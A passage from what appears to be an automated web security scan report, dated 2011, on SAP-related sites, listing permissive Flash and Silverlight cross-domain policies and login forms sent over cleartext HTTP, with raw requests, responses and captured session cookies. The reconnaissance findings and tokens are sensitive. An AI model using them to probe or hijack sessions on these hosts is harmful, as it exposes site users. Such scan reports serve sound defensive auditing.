<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
   <allow-access-from domain="www.phunt.dev2439.facebook.com" />
...[SNIP]...
4.13. http://www.sap.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sap.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sap.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=7200
Content-Type: text/xml
Last-Modified: Mon, 31 Jan 2011 14:40:15 GMT
Accept-Ranges: bytes
ETag: "66f151c654c1cb1:0"
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:20:47 GMT
Connection: close
Content-Length: 765

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.sap.com"/>
   <allow-access-from domain="*.vcopious.com"/>
   <allow-access-from domain="*.sapphirenow.com"/>
   <allow-access-from domain="www.sapphirenow.com"/>
   <allow-access-from domain="virtualevents.sap.com"/>
   <allow-access-from domain="virtualevents1.sap.com"/>
   <allow-access-from domain="virtualevents2.sap.com"/>
   <allow-access-from domain="www.virtualevents.sap.com"/>
   <allow-access-from domain="www.sapconfigurator.com"/>
   <allow-access-from domain="*.sapvirtualevents.com"/>
   <allow-access-from domain="*.sappartnerkickoff.com"/>
...[SNIP]...
4.14. https://www.sap.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sap.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sap.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=7200
Content-Type: text/xml
Last-Modified: Mon, 31 Jan 2011 14:40:15 GMT
Accept-Ranges: bytes
ETag: "66f151c654c1cb1:0"
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:29 GMT
Connection: close
Content-Length: 765

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.sap.com"/>
   <allow-access-from domain="*.vcopious.com"/>
   <allow-access-from domain="*.sapphirenow.com"/>
   <allow-access-from domain="www.sapphirenow.com"/>
   <allow-access-from domain="virtualevents.sap.com"/>
   <allow-access-from domain="virtualevents1.sap.com"/>
   <allow-access-from domain="virtualevents2.sap.com"/>
   <allow-access-from domain="www.virtualevents.sap.com"/>
   <allow-access-from domain="www.sapconfigurator.com"/>
   <allow-access-from domain="*.sapvirtualevents.com"/>
   <allow-access-from domain="*.sappartnerkickoff.com"/>
...[SNIP]...
4.15. http://www.sapphirenow.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sapphirenow.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/xml
Date: Sat, 15 Oct 2011 14:23:03 GMT
Accept-Ranges: bytes
ETag: "fce0a340e329cc1:0"
Connection: close
Last-Modified: Mon, 13 Jun 2011 16:02:10 GMT
X-Powered-By: ASP.NET
Content-Length: 331

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.vcopious.com"/>
<allow-access-from domain="*.sapphirenow.com"/>
...[SNIP]...
5. Silverlight cross-domain policy  previous  next
There are 3 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://omnituremarketing.d1.sc.omtrdc.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.d1.sc.omtrdc.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: omnituremarketing.d1.sc.omtrdc.net

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 13:47:21 GMT
Server: Omniture DC/2.0.0
xserver: www337
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
5.2. http://sap.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sap.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: sap.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:24:58 GMT
Server: Omniture DC/2.0.0
xserver: www379
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
5.3. http://static.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: static.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 15 Oct 2011 14:24:55 GMT
Expires: Sun, 16 Oct 2011 14:24:55 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
6. Cleartext submission of password  previous  next
There are 12 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

6.1. http://www.asugonline.com/cms/FormBuilder/Register.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.asugonline.com
Path:   /cms/FormBuilder/Register.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /cms/FormBuilder/Register.aspx?EventId=12&popupTitle=Register%20Yourself&popupWidth=800&popupHeight=500&formtypeid=1 HTTP/1.1
Host: www.asugonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.asugonline.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hi12vc2iab2rdx45ml1cpz55; CmsAdmin=eventid=1&languageid=1; X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:27:46 GMT
Content-Length: 22076


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

...[SNIP]...
<body class="body" style=" margin: 0px" >
<form name="form1" method="post" action="Register.aspx?EventId=12&amp;popupTitle=Register+Yourself&amp;popupWidth=800&amp;popupHeight=500&amp;formtypeid=1" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
...[SNIP]...
<td width="35%" style="Padding: 0px 0px 0px 15px;"><input name="DynamicFormControl1$ctrlPassword105" type="password" id="DynamicFormControl1_ctrlPassword105" class="textbox" /></td>
...[SNIP]...
6.2. http://www.sapbusinessoptimizer.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.sapbusinessoptimizer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:04:28 GMT
Server: Apache
Set-Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Home</title>
<meta
...[SNIP]...
</ul>
   
   <form onsubmit="Login.submit('mini');" action="javascript:void(0);">
       <div class="field">
...[SNIP]...
</label>
           <input type="password" name="Password" id="mini_pass" class="text" value="Password" />
       </div>
...[SNIP]...
6.3. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapandasug.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:25:57 GMT
Content-Length: 42868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<body>
<form name="form1" method="post" action="login.aspx?ReturnUrl=%2fdefault.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1" style="height: 300px;">
<div>
...[SNIP]...
<div class="email-container">
<input name="userLogin1$txtPassword" type="password" id="userLogin1_txtPassword" class="text-field" />
<span id="userLogin1_rfvpassword" style="color:Red;display:none;">
...[SNIP]...
6.4. http://www.sapvirtualevents.com/teched/login.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /teched/login.aspx?eventid=1&languageid=1&ReturnUrl=default.aspx%3feventname%3dteched%26 HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=3u4vth452bt54055m1l5rj55

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /teched/default.aspx
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
Set-Cookie: IsFirstTimeLogin=1; path=/
Set-Cookie: userID=1; path=/
Set-Cookie: userID=1; path=/
Set-Cookie: securityRoleID=0; path=/
Set-Cookie: .SESSION_COOKIE_TECHED=1|Anonymous|Anonymous||Anonymous@Anonymous.com|0|1|1|0|General Settings||7df06b41-67e5-4e76-b695-2d83bcab420b|United States|4b117873-111d-43fb-aa45-4e60c941153b|true; expires=Tue, 15-Nov-2011 15:30:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:12 GMT
Content-Length: 29108

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fteched%2fdefault.aspx">here</a>.</h2>
</body></html>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="/teched/login.aspx?eventid=1&amp;languageid=1&amp;ReturnUrl=default.aspx%3feventname%3dteched%26" style="height: 300px;" id="aspnetForm"><div>
...[SNIP]...
<div class="email-container">
<input name="ctl00$ContentPlaceHolder1$userLogin1$txtPassword" type="password" id="ctl00_ContentPlaceHolder1_userLogin1_txtPassword" class="text-field" />
<span id="ctl00_ContentPlaceHolder1_userLogin1_rfvpassword" style="color:Red;display:none;">
...[SNIP]...
6.5. http://www.sdn.sap.com/irj/scn/advancedsearch  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/advancedsearch

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /irj/scn/advancedsearch?query=xss+password+help+faq+contact HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/sdnweblogs/popularposts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fq%2ftop_weblogs; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318691787|check#true#1318689987; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Asdnweblogs%253Apopularposts%7C1318691728224%3B%20pe%3Dno%2520value%7C1318691728230%3B%20c3%3Dno%2520value%7C1318691728253%3B%20s_nr%3D1318689928258-New%7C1321281928258%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293528260%3B%20s_visit%3D1%7C1318691728263%3B%20gpv_p47%3Dno%2520value%7C1318691728265%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D6%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Ascn%2525253Asdnweblogs%2525253Apopularposts%252526pidt%25253D1%252526oid%25253Djavascript%2525253Adocument.searchboxform.submit%25252528%25252529%2525253B%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Content-Length: 28741
Date: Sat, 15 Oct 2011 14:59:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...
6.6. http://www.sdn.sap.com/irj/scn/downloads  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/downloads

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /irj/scn/downloads HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
SDN_RES_KEY: /webcontent/uuid/087fe75d-0501-0010-11bf-80f5c43d4f0c
Expires: 0
Date: Sat, 15 Oct 2011 15:04:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=scn; Path=/
Content-Length: 61519

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...
6.7. http://www.sdn.sap.com/irj/scn/index  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/index

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /irj/scn/index HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
SDN_RES_KEY: /webcontent/uuid/10956870-6186-2b10-86ab-e0bbdc47e11f
Expires: 0
Date: Sat, 15 Oct 2011 15:04:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=scn; Path=/
Content-Length: 58094

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...
6.8. http://www.sdn.sap.com/irj/scn/logon  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/logon

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /irj/scn/logon HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:04:50 GMT
Content-Length: 21956
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...
6.9. http://www.sdn.sap.com/irj/scn/sdnweblogs/popularposts  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/sdnweblogs/popularposts

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /irj/scn/sdnweblogs/popularposts HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/pub/wlg/26917
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; PortalAlias=scn; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=https%3a%2f%2fwww.sme.sap.com%2firj%2fsme%2flogon; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; 